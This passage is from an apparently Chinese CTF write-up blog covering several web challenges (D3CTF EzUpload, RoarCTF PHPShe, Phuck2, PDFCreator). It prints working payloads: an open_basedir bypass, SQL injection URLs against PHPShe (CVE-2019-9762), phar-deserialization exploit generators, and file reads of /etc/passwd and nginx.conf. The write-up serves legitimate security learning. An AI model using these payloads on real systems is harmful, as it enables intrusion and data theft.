class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>前后瞎凑的字符串为了绕过过滤</p>
<img src="/2020/08/06/remaining/5.png" class="">

<p>到这里能访问就能看到phpinfo页面了，但是环境问题没成功，那个上传后的目录不能访问</p>
<p>最后还有一步就是绕过<code>open_basedir和disable_function</code></p>
<p>直接用蚁剑的插件就能绕过拿到flag了，这里就没图能贴了，或者是</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">chdir(<span class="string">'..'</span>);ini_set(<span class="string">'open_basedir'</span>,<span class="string">'..'</span>);chdir(<span class="string">'..'</span>);chdir(<span class="string">'..'</span>);chdir(<span class="string">'..'</span>);chdir(<span class="string">'..'</span>);chdir(<span class="string">'..'</span>);chdir(<span class="string">'..'</span>);ini_set(<span class="string">'open_basedir'</span>,<span class="string">'/'</span>);var_dump(scandir(<span class="string">'/'</span>));</span><br><span class="line"></span><br><span class="line">ini_set(<span class="string">'open_basedir'</span>, <span class="string">'..'</span>);chdir(<span class="string">'..'</span>);chdir(<span class="string">'..'</span>);chdir(<span class="string">'..'</span>);chdir(<span class="string">'..'</span>);chdir(<span class="string">'..'</span>);chdir(<span class="string">'..'</span>);ini_set(<span class="string">'open_basedir'</span>, <span class="string">'/'</span>);var_dump(show_source(<span class="string">'/F1aG_1s_H4r4'</span>));</span><br></pre></td></tr></table></figure>

<p>也可以拿到flag，那这题就到这了，学到东西才是真，flag不重要(233333)</p>
<h2 id="RoarCTF-2019-PHPShe"><a href="#RoarCTF-2019-PHPShe" class="headerlink" title="[RoarCTF 2019]PHPShe"></a>[RoarCTF 2019]PHPShe</h2><h2 id="知识点-2"><a href="#知识点-2" class="headerlink" title="知识点"></a>知识点</h2><ul>
<li>无列名注入</li>
<li>phar反序列化</li>
<li>代码审计</li>
<li>获取token</li>
</ul>
<h2 id="解题步骤-2"><a href="#解题步骤-2" class="headerlink" title="解题步骤"></a>解题步骤</h2><p>题目给了源码，直接下载</p>
<p>开题，phpshe一个商户框架，查一下CVE(<a href="https://anquan.baidu.com/article/697" target="_blank" rel="noopener">https://anquan.baidu.com/article/697</a>)</p>
<p>比较源码，XXE<strong>（CVE-2019-9761）</strong>因为删除了notify_url.php这个文件，不能用</p>
<p>看一下<strong>无限制SQL注入分析（CVE-2019-9762）</strong>，跟着文章一步步看，直接看重点</p>
<p>漏洞利用点的入口在include/plugin/payment/alipay/pay.php，这里是唯一有回显的位置，poc：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12%23_</span><br></pre></td></tr></table></figure>

<img src="/2020/08/06/remaining/6.png" class="">

<p>因为过滤了下划线，这里要用到无列名注入</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,(<span class="keyword">select</span><span class="string">`3`</span><span class="keyword">from</span>(<span class="keyword">select</span>%<span class="number">201</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>%<span class="number">20</span><span class="keyword">union</span>%<span class="number">20</span><span class="keyword">select</span>%<span class="number">20</span>*%<span class="number">20</span><span class="keyword">from</span>%<span class="number">20</span><span class="keyword">admin</span>)a%<span class="number">20</span><span class="keyword">limit</span>%<span class="number">201</span>,<span class="number">1</span>),<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,<span class="number">8</span>,<span class="number">9</span>,<span class="number">10</span>,<span class="number">11</span>,<span class="number">12</span>%<span class="number">23</span>_</span><br></pre></td></tr></table></figure>

<img src="/2020/08/06/remaining/7.png" class="">

<p>拿到MD5加密后的密码，解密得到admin/altman777，登录后台</p>
<p>在品牌管理处发现可以上传文件，这里因为就是利用点了</p>
<img src="/2020/08/06/remaining/8.png" class="">

<p>本题目的源代码在<code>/include/class/pclzip.class.php</code>多了个析构魔术方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">  </span>&#123;</span><br><span class="line">      <span class="keyword">$this</span>-&gt;extract(PCLZIP_OPT_PATH, <span class="keyword">$this</span>-&gt;save_path);</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>跟进第一个参数，在<code>module/admin/moban.php</code></p>
<img src="/2020/08/06/remaining/9.png" class="">

<p>这个类起到解压缩的作用，那么应该会用到phar协议</p>
<p>同时，在moban.php中可以看到，引用了<code>pclzip.class.php</code></p>
<img src="/2020/08/06/remaining/10.png" class="">

<p>继续往下看，看到了del方法</p>
<img src="/2020/08/06/remaining/11.png" class="">

<p>跟进一下pe_dirdel方法</p>
<img src="/2020/08/06/remaining/12.png" class="">

<p>看到了is_file，那么phar的触发点就找到了</p>
<p>思路清晰了，通过moban.php的del功能传入<strong>tpl</strong>参数，通过<strong>is_file</strong>函数触发<strong>phar反序列化</strong>，对之前上传的包含shell的zip文件进行解压缩得到shell</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">PclZip</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">var</span> $zipname = <span class="string">''</span>;</span><br><span class="line">    <span class="keyword">var</span> $zip_fd = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">var</span> $error_code = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">var</span> $error_string = <span class="string">''</span>;</span><br><span class="line">    <span class="keyword">var</span> $magic_quotes_status;</span><br><span class="line">    <span class="keyword">var</span> $save_path;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($p_zipname)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;zipname = $p_zipname;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;zip_fd = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;magic_quotes_status = <span class="number">-1</span>;</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$f=<span class="keyword">new</span> PclZip(<span class="string">"/var/www/html/data/attachment/brand/5.zip"</span>);</span><br><span class="line">$f-&gt;save_path=<span class="string">'/var/www/html/data'</span>;</span><br><span class="line"><span class="keyword">echo</span> serialize($f);</span><br><span class="line">$phar = <span class="keyword">new</span> Phar(<span class="string">"phar.phar"</span>);</span><br><span class="line">$phar-&gt;startBuffering();</span><br><span class="line">$phar-&gt;setStub(<span class="string">"GIF89a"</span>,<span class="string">"&lt;?php __HALT_COMPILER(); ?&gt;"</span>);</span><br><span class="line">$phar-&gt;setMetadata($f);</span><br><span class="line">$phar-&gt;addFromString(<span class="string">"test.txt"</span>, <span class="string">"test"</span>);</span><br><span class="line">$phar-&gt;stopBuffering();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>主要的参数就是上传的shell路径以及保存的路径</strong></p>
<p>上传路径在上传之后能够看到</p>
<img src="/2020/08/06/remaining/13.png" class="">

<p>上传小🐎之后修改exp中的路径即可</p>
<p>之后再上传phar文件，抓包修改文件名为1.txt</p>
<p>这里还要注意的点就是token的获取，token在备份的数据库恢复时能够获取得到</p>
<img src="/2020/08/06/remaining/14.png" class="">

<p>这样一来token就到手了，之后再带上referer</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Referer:http://c9ef4168-ae76-49ee-aa39-1808fc8dfd36.node3.buuoj.cn/admin.php?mod=moban</span><br></pre></td></tr></table></figure>

<p>进行删除操作来解压缩上传的小🐎压缩包</p>
<img src="/2020/08/06/remaining/15.png" class="">

<p>下面就能访问data下的小🐎文件了，读取一下根目录找到flag文件，再读取内容</p>
<img src="/2020/08/06/remaining/16.png" class="">

<h2 id="Phuck2"><a href="#Phuck2" class="headerlink" title="Phuck2"></a>Phuck2</h2><h3 id="知识点-3"><a href="#知识点-3" class="headerlink" title="知识点"></a>知识点</h3><ul>
<li>DATA URL</li>
<li>file_get_contents和include处理data：特性</li>
</ul>
<h2 id="解题步骤-3"><a href="#解题步骤-3" class="headerlink" title="解题步骤"></a>解题步骤</h2><p>这题打开全是白的，不知道怎么整，看了源码要传入hl参数才能看到源码，这谁想得到</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line">    stream_wrapper_unregister(<span class="string">'php'</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'hl'</span>])) highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">    $mkdir = <span class="function"><span class="keyword">function</span><span class="params">($dir)</span> </span>&#123;</span><br><span class="line">        system(<span class="string">'mkdir -- '</span>.escapeshellarg($dir));</span><br><span class="line">    &#125;;</span><br><span class="line">    $randFolder = bin2hex(random_bytes(<span class="number">16</span>));</span><br><span class="line">    $mkdir(<span class="string">'users/'</span>.$randFolder);</span><br><span class="line">    chdir(<span class="string">'users/'</span>.$randFolder);</span><br><span class="line">    $userFolder = (<span class="keyword">isset</span>($_SERVER[<span class="string">'HTTP_X_FORWARDED_FOR'</span>]) ? $_SERVER[<span class="string">'HTTP_X_FORWARDED_FOR'</span>] : $_SERVER[<span class="string">'REMOTE_ADDR'</span>]);</span><br><span class="line">    $userFolder = basename(str_replace([<span class="string">'.'</span>,<span class="string">'-'</span>],[<span class="string">''</span>,<span class="string">''</span>],$userFolder));</span><br><span class="line">    $mkdir($userFolder);</span><br><span class="line">    chdir($userFolder);</span><br><span class="line">    file_put_contents(<span class="string">'profile'</span>,print_r($_SERVER,<span class="keyword">true</span>));</span><br><span class="line">    chdir(<span class="string">'..'</span>);</span><br><span class="line">    $_GET[<span class="string">'page'</span>]=str_replace(<span class="string">'.'</span>,<span class="string">''</span>,$_GET[<span class="string">'page'</span>]);</span><br><span class="line">    <span class="keyword">if</span>(!stripos(file_get_contents($_GET[<span class="string">'page'</span>]),<span class="string">'&lt;?'</span>) &amp;&amp; !stripos(file_get_contents($_GET[<span class="string">'page'</span>]),<span class="string">'php'</span>)) &#123;</span><br><span class="line">        <span class="keyword">include</span>($_GET[<span class="string">'page'</span>]);</span><br><span class="line">    &#125;</span><br><span class="line">    chdir(<span class="keyword">__DIR__</span>);</span><br><span class="line">    system(<span class="string">'rm -rf users/'</span>.$randFolder);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>一开始就ban掉了php数据流，后面的escapeshellarg过滤了传入的参数，绕不过</p>
<p>接着往下走，<code>X-Forwarded-For</code>头中的目录名会赋值给$userFolder，并且过滤了.和-,下面将数据写入了$userFolder/profile中，没有任何过滤，在$page中过滤了点号，看到了include应该是包含了，不过这里又过滤了<code>&lt;?</code>和<code>php</code></p>
<p>重点来了，关于 include 与 file_get_contents对Data URI 处理上的问题</p>
<p>自己小小测试一把</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="keyword">print</span>(<span class="keyword">include</span>(<span class="string">"data:,profile"</span>));</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;br /&gt;'</span>;</span><br><span class="line">	<span class="keyword">print</span>(file_get_contents(<span class="string">"data:,profile"</span>));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<img src="/2020/08/06/remaining/17.png" class="">

<p>可以看到<code>file_get_content()</code>正常返回，<code>include()</code>报错，这里忘记说了，当时的比赛应该给了hint，<code>allow_url_include = Off,allow_url_fopen = On</code></p>
<p>在这种情况下要怎么做呢，这就是<code>include()</code>在不允许包含的情况下，如果说DATA URL是个目录文件就可以绕过</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="keyword">print</span>(<span class="keyword">include</span>(<span class="string">"data:,123456/profile"</span>));</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;br /&gt;'</span>;</span><br><span class="line">	<span class="keyword">print</span>(file_get_contents(<span class="string">"data:,123456/profile"</span>));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<img src="/2020/08/06/remaining/18.png" class="">

<p>可以看到正常包含了，返回了1</p>
<p>这里就可以这样做了</p>
<img src="/2020/08/06/remaining/19.png" class="">

<p>下面只需要更改写入的内容执行代码，这里不用cat读取内容，直接如图中所示即可</p>
<img src="/2020/08/06/remaining/20.png" class="">

<h2 id="Chaos-Communication-Camp-2019-PDFCreator"><a href="#Chaos-Communication-Camp-2019-PDFCreator" class="headerlink" title="[Chaos Communication Camp 2019]PDFCreator"></a>[Chaos Communication Camp 2019]PDFCreator</h2><h3 id="知识点-4"><a href="#知识点-4" class="headerlink" title="知识点"></a>知识点</h3><ul>
<li>phar反序列化</li>
<li>/etc/nginx/nginx.conf配置信息</li>
</ul>
<h3 id="解题步骤-4"><a href="#解题步骤-4" class="headerlink" title="解题步骤"></a>解题步骤</h3><p>直接看给的源码，down一份下来</p>
<p>在index.php中</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">else</span> <span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">"pdfcontent"</span>]))</span><br><span class="line">&#123;</span><br><span class="line">	$creator = <span class="keyword">new</span> \PDFStuff\PDFCreator();</span><br><span class="line">	$creator-&gt;createPdf($_POST[<span class="string">"pdfcontent"</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>在PDFStuff命名空间下有一个PDFCreator类，跟一下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">PDFStuff</span></span><br><span class="line">&#123;</span><br><span class="line">include 'TCPDF/tcpdf.php';</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">PDFCreator</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">   <span class="keyword">public</span> $tmpfile;</span><br><span class="line">   <span class="keyword">public</span> $finalfile;</span><br><span class="line">   </span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span></span></span><br><span class="line"><span class="function">   </span>&#123;</span><br><span class="line">   <span class="keyword">if</span> (file_exists(<span class="keyword">$this</span>-&gt;tmpfile))</span><br><span class="line">   &#123;</span><br><span class="line">   $info = pathinfo(<span class="keyword">$this</span>-&gt;tmpfile);</span><br><span class="line">   <span class="keyword">if</span> ($info[<span class="string">'extension'</span>] == <span class="string">"pdf"</span>)</span><br><span class="line">   &#123;</span><br><span class="line">   unlink(<span class="keyword">$this</span>-&gt;tmpfile);</span><br><span class="line">   &#125;</span><br><span class="line">   <span class="keyword">else</span></span><br><span class="line">   &#123;</span><br><span class="line">   <span class="keyword">echo</span> <span class="string">"Could not delete created PDF: Not a pdf. Check the file: "</span> . file_get_contents(<span class="keyword">$this</span>-&gt;tmpfile);</span><br><span class="line">   &#125;</span><br><span class="line">   &#125;</span><br><span class="line">   &#125;</span><br><span class="line">   &#125;</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure>

<p>可以看到<em>\</em>destruct()魔术方法中在判断文件存在并且不是pdf文件后，会包含这个文件读取内容，这里就想到了phar协议</p>
<p>利用点在</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">h1</span>&gt;</span>Converted by CoolPDF<span class="tag">&lt;/<span class="name">h1</span>&gt;</span><span class="tag">&lt;<span class="name">h3</span>&gt;</span>We hope you enjoyed our service!<span class="tag">&lt;/<span class="name">h3</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">"phar://./upload/d7f4be9d064bac5fd42207b3d7efe102_10.jpg"</span> <span class="attr">width</span>=<span class="string">"10"</span> <span class="attr">height</span>=<span class="string">"10"</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>src这里可以利用phar://来进行解析</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">PDFStuff</span>&#123;</span><br><span class="line">        <span class="title">class</span> <span class="title">PDFCreator</span>&#123;</span><br><span class="line">                public $tmpfile='/etc/passwd';</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> &#123;</span><br><span class="line">$<span class="title">a</span>=<span class="title">new</span> \<span class="title">PDFStuff</span>\<span class="title">PDFCreator</span>();</span><br><span class="line">@unlink(<span class="string">"phar.phar"</span>);</span><br><span class="line">$phar=<span class="keyword">new</span> \Phar(<span class="string">"phar.phar"</span>);</span><br><span class="line">$phar-&gt;startBuffering();</span><br><span class="line">$phar-&gt;setStub(<span class="string">'GIF89a'</span>.<span class="string">"&lt;?php __HALT_COMPILER(); ?&gt;"</span>);</span><br><span class="line">$phar-&gt;setMetadata($a);</span><br><span class="line">$phar-&gt;addFromString(<span class="string">"test.txt"</span>, <span class="string">"test"</span>);</span><br><span class="line">$phar-&gt;stopBuffering();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<img src="/2020/08/06/remaining/21.png" class="">

<p>这里要注意得是web服务目录不是/var/www/html,得读取nginx配置信息</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;etc&#x2F;nginx&#x2F;nginx.conf</span><br></pre></td></tr></table></figure>

<img src="/2020/08/06/remaining/22.png" class="">

<p>得到根目录是<code>/var/www/site</code></p>
<p>读取之前扫到得flag.php即可</p>
<img src="/2020/08/06/remaining/23.png" class="">


    </div>

    
    
    
        <div class="reward-container">
  <div></div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    Donate
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.jpg" alt="Peguin WeChat Pay">
        <p>WeChat Pay</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.jpg" alt="Peguin Alipay">
        <p>Alipay</p>
      </div>

  </div>
</div>

        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Peguin
  </li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="http://yoursite.com/2020/08/06/remaining/" title="remaining">http://yoursite.com/2020/08/06/remaining/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> unless stating additionally.
  </li>
</ul>
</div>

        

  <div class="followme">
    <p>Welcome to my other publishing channels</p>

    <div class="social-list">

        <div class="social-item">
          <a target="_blank" class="social-link" href="/images/2.jpg">
            <span class="icon">
              <i class="fab fa-weixin"></i>
            </span>

            <span class="label">WeChat</span>
          </a>
        </div>

        <div class="social-item">
          <a target="_blank" class="social-link" href="/atom.xml">
            <span class="icon">
              <i class="fa fa-rss"></i>
            </span>

            <span class="label">RSS</span>
          </a>
        </div>
    </div>
  </div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/buu/" rel="tag"># buu</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/08/04/SWPUCTF2016-Web-blogsys/" rel="prev" title="SWPUCTF2016-Web-blogsys">
      <i class="fa fa-chevron-left"></i> SWPUCTF2016-Web-blogsys
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/08/15/DASfinaltest/" rel="next" title="DASfinaltest">
      DASfinaltest <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  <div>
  
    <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
  
</div>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Zer0pts2020-musicblog"><span class="nav-number">1.</span> <span class="nav-text">[Zer0pts2020]musicblog</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#知识点"><span class="nav-number">2.</span> <span class="nav-text">知识点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#解题步骤"><span class="nav-number">3.</span> <span class="nav-text">解题步骤</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#D3CTF-2019-EzUpload-环境问题未打通，一个早上没整出来"><span class="nav-number">4.</span> <span class="nav-text">[D3CTF 2019]EzUpload(环境问题未打通，一个早上没整出来)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#知识点-1"><span class="nav-number">5.</span> <span class="nav-text">知识点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#解题步骤-1"><span class="nav-number">6.</span> <span class="nav-text">解题步骤</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RoarCTF-2019-PHPShe"><span class="nav-number">7.</span> <span class="nav-text">[RoarCTF 2019]PHPShe</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#知识点-2"><span class="nav-number">8.</span> <span class="nav-text">知识点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#解题步骤-2"><span class="nav-number">9.</span> <span class="nav-text">解题步骤</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Phuck2"><span class="nav-number">10.</span> <span class="nav-text">Phuck2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#知识点-3"><span class="nav-number">10.1.</span> <span class="nav-text">知识点</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#解题步骤-3"><span class="nav-number">11.</span> <span class="nav-text">解题步骤</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Chaos-Communication-Camp-2019-PDFCreator"><span class="nav-number">12.</span> <span class="nav-text">[Chaos Communication Camp 2019]PDFCreator</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#知识点-4"><span class="nav-number">12.1.</span> <span class="nav-text">知识点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#解题步骤-4"><span class="nav-number">12.2.</span> <span class="nav-text">解题步骤</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Peguin"
      src="/images/1.jpg">
  <p class="site-author-name" itemprop="name">Peguin</p>
  <div class="site-description" itemprop="description">敢于去想，才会有MEteor的光芒闪耀。</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">62</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">33</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ambitiousleader/" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ambitiousleader&#x2F;" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/601209387@qq.com" title="E-Mail → 601209387@qq.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://weibo.com/u/6772435317/home?wvr=5&sudaref=graph.qq.com" title="Weibo → https:&#x2F;&#x2F;weibo.com&#x2F;u&#x2F;6772435317&#x2F;home?wvr&#x3D;5&amp;sudaref&#x3D;graph.qq.com" rel="noopener" target="_blank"><i class="fab fa-weibo fa-fw"></i>Weibo</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Peguin</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,0' opacity='0.5' zIndex='-1' count='150' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>


  <script defer src="/lib/three/three.min.js"></script>


  




  
<script src="/js/local-search.js"></script>













  

  


  
